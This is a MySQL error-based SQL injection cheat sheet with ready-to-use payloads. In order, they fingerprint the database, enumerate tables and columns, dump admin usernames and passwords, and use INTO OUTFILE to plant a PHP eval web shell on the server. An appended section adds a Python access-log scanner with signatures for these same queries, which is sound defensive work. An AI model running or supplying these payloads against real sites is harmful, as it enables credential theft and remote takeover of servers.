Statement template:

and(select 1 from(select count(*),concat((select concat(<injected query>) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

Dumping some site-related information:

and (select 1 from(select count(*),concat((select concat(0x3a,database(),0x3a,user(),0x3a,version(),0x3a,@@datadir) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a)>

Dumping data: relevant functions and variables:
system_user() system user name
user() user name
current_user current user name
session_user() user name of the database connection
database() database name
version() MySQL version
load_file() MySQL function that reads a local file
@@datadir data directory path
@@basedir MySQL installation path
@@version_compile_os operating system
information_schema.schemata table of database names
information_schema.tables table of table names
information_schema.columns table of column names

'and(select 1 from(select count(*),concat((select concat(<function 1>,0x20,<function 2>,0x20,......) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

2. Dumping tables
'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(table_name) from information_schema.tables where table_schema=<hex of database name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
.......

3. Dumping columns
'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(column_name) from information_schema.columns where table_name=<hex of table name> limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........

4. Dumping usernames and passwords
'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

'and(select 1 from(select count(*),concat((select concat(username,0x20,password) from admin limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
........

' or 1 AND (SELECT id FROM the_users limit 1 INTO OUTFILE 'D:/sub/jw/safe1.php' lines terminated by '<?php eval($_POST[safe])?>') #
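Added detection example, not part of the original page: a Python scanner that normalizes the request target of web-server access-log lines (repeated URL decoding, comment stripping) and flags the markers of the queries listed above: the floor(rand(0)*2) GROUP BY key, information_schema enumeration, the fingerprinting functions and variables, and INTO OUTFILE. The log lines, client IPs, paths and the /tmp/out.txt target are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Combined Log Format), not taken from the page.
# Line 2 carries the floor(rand(0)*2)/GROUP BY fingerprinting query; line 3 an INTO OUTFILE
# write attempt, with a neutral constructed target path.
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /item.php?id=1%27and(select+1+from(select+count(*),'
    'concat((select+concat(0x3a,database(),0x3a,user())+from+information_schema.tables+limit+0,1),'
    'floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)and%27 HTTP/1.1" 500 88',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /item.php?id=1%27+or+1+AND+(SELECT+id+FROM+the_users'
    '+limit+1+INTO+OUTFILE+%27/tmp/out.txt%27)+%23 HTTP/1.1" 200 12',
]

# A signature fires only when ALL of its patterns match the normalized request target.
SIGNATURES = {
    "error_based_double_query": [r"floor\(rand\(0\)\*2\)", r"\bgroup by\b", r"count\(\*\)"],
    "information_schema_probe": [r"information_schema\.(schemata|tables|columns)\b"],
    "fingerprint_functions": [r"\b(database|user|version|system_user|session_user|load_file)\("
                              r"|@@(datadir|basedir|version_compile_os)"],
    "file_write": [r"\binto (out|dump)file\b"],
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(target, rounds=3):
    """URL-decode repeatedly (defeats double encoding), drop /* */ comments, collapse whitespace, lowercase."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    target = re.sub(r"/\*.*?\*/", " ", target)  # inline comments used to split keywords
    return re.sub(r"\s+", " ", target).lower()

def classify(line):
    """Return (client_ip, [matched signature names]) for one log line; None if no request is found."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = normalize(m.group(1))
    hits = [name for name, pats in SIGNATURES.items() if all(re.search(p, target) for p in pats)]
    return line.split(" ", 1)[0], hits

def scan(lines):
    """Keep only the lines that triggered at least one signature."""
    return [r for r in map(classify, lines) if r and r[1]]
```

Feeding a real access log through scan() and alerting on any "error_based_double_query" or "file_write" hit from a single client is the practical use; the benign first line produces no hit.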